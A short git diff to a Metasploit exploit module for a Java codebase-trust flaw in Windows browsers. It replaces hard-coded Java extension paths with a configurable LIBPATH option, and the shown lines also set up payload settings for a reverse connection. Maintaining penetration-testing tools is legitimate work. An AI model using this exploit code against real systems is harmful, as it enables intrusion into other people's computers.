diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 0ff899aeb2..ac4120084d 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -114,8 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote host_num = Rex::Socket.addr_aton(host).unpack('N').first code_url = jpath.sub(host, host_num.to_s) - codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext" - codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext" + codebase = "file:" + datastore['LIBPATH'] config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n" # The java payloads decide to be reverse if LHOST is set.